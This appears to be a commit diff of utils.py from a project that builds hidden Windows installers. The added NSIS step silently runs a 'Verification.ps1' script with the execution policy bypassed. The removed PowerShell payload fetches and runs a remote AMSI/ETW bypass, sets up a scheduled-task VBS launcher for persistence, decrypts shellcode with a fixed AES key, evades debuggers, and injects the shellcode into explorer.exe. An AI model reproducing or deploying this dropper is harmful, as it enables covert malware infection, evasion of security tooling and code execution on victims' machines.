sigyllly commited on
Commit
9236e3e
·
verified ·
1 Parent(s): fdd6b99

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +8 -106
utils.py CHANGED
@@ -93,7 +93,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
93
  SetOutPath "$WINDIR\..\ProgramData\Installer"
94
  File "{bin_file}"
95
  File "{ps1_file}"
96
- ExecShell "" "$WINDIR\..\ProgramData\Installer\\Verification.ps1" SW_HIDE
97
  SetAutoClose true
98
  SectionEnd
99
  """
@@ -213,111 +213,13 @@ def process_request(request):
213
  # Extract the file name from the full binary path
214
  bin_file_name = os.path.basename(bin_path)
215
 
216
- # Create the PowerShell script with the provided content
217
- ps1_content = f'''
218
- # Download and execute the script from the provided URL
219
- iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
220
- # Run the Invoke-NullAMSI command
221
- Invoke-NullAMSI
222
- Invoke-NullAMSI -etw
223
- # Define the content of the VBScript
224
- $vbsContent = @'
225
- Set objShell = CreateObject("WScript.Shell")
226
- objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
227
- '@
228
- # Define the file path for the .vbs file in the desired location
229
- $vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
230
- # Write the content to the .vbs file
231
- $vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
232
- Write-Host "VBScript file created at: $vbsFilePath"
233
- $Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
234
- $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
235
- Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
236
- # Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
237
- $keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
238
- # Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
239
- if ($keyBytes.Length -gt 16) {{
240
- $keyBytes = $keyBytes[0..15] # Trim the key to 16 bytes if it's longer
241
- }}
242
- elseif ($keyBytes.Length -lt 16) {{
243
- # If the key is too short, pad it with zeros to make it 16 bytes
244
- $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
245
- }}
246
- # Function to download the encrypted binary from the server
247
- function Download-EncryptedShellcode {{
248
- param([string]$url)
249
- # Download the encrypted binary file directly into memory as a byte array
250
- $response = Invoke-WebRequest -Uri $url -UseBasicParsing
251
- return $response.Content
252
- }}
253
- # Read the encrypted shellcode from a local binary file
254
- $encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
255
- # Create an AES encryption object
256
- $aes = [System.Security.Cryptography.Aes]::Create()
257
- # Set the decryption key and initialization vector (IV)
258
- $aes.Key = $keyBytes
259
- $aes.IV = $keyBytes[0..15] # Use the first 16 bytes of the key for the IV
260
- # Create a memory stream to hold the decrypted data
261
- $memoryStream = New-Object System.IO.MemoryStream
262
- $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
263
- # Decrypt the encrypted data into the memory stream
264
- $cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
265
- $cryptoStream.Close()
266
- # Get the decrypted shellcode
267
- $buf = $memoryStream.ToArray()
268
- # Anti-debugging mechanism
269
- function IsDebuggerPresent {{
270
- $IsDebuggerPresentCode = @"
271
- using System;
272
- using System.Runtime.InteropServices;
273
- public class DebugHelper {{
274
- [DllImport(\\"kernel32.dll\\")]
275
- public static extern bool IsDebuggerPresent();
276
- }}
277
- "@
278
- $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
279
- return $debugHelper::IsDebuggerPresent()
280
- }}
281
- if (IsDebuggerPresent) {{
282
- Write-Host "Debugger detected. Exiting."
283
- exit
284
- }}
285
- # Inject shellcode into a target process (example: explorer.exe)
286
- $Win32APICode = @"
287
- using System;
288
- using System.Runtime.InteropServices;
289
- public class Win32API {{
290
- [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
291
- public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
292
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
293
- public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
294
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
295
- public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
296
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
297
- public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
298
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
299
- [return: MarshalAs(UnmanagedType.Bool)]
300
- public static extern bool CloseHandle(IntPtr hObject);
301
- }}
302
- "@
303
- $win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
304
- # Target process (explorer.exe) injection
305
- $targetProcess = Get-Process explorer | Select-Object -First 1
306
- $processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
307
- # Allocate memory in the target process
308
- $size = 0x1000
309
- if ($buf.Length -gt $size) {{ $size = $buf.Length }}
310
- $remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
311
- # Write the shellcode into the allocated memory
312
- $bytesWritten = [IntPtr]::Zero
313
- $win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
314
- # Create a remote thread to execute the shellcode
315
- $threadId = [IntPtr]::Zero
316
- $win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
317
- # Close the process handle
318
- $win32api::CloseHandle($processHandle)
319
- Write-Host "Shellcode injection completed successfully."
320
- '''
321
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
322
  with open(ps1_path, 'w') as ps1_file:
323
  ps1_file.write(ps1_content)
 
93
  SetOutPath "$WINDIR\..\ProgramData\Installer"
94
  File "{bin_file}"
95
  File "{ps1_file}"
96
+ ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
97
  SetAutoClose true
98
  SectionEnd
99
  """
 
213
  # Extract the file name from the full binary path
214
  bin_file_name = os.path.basename(bin_path)
215
 
216
+ # Read the PowerShell content from the local file
217
+ with open(POWERSHELL_FILE_PATH, 'r') as ps1_file:
218
+ ps1_content = ps1_file.read()
219
+
220
+ # Replace the placeholder with the actual binary file name
221
+ ps1_content = ps1_content.replace("{bin_file_name}", bin_file_name)
222
+
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
223
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
224
  with open(ps1_path, 'w') as ps1_file:
225
  ps1_file.write(ps1_content)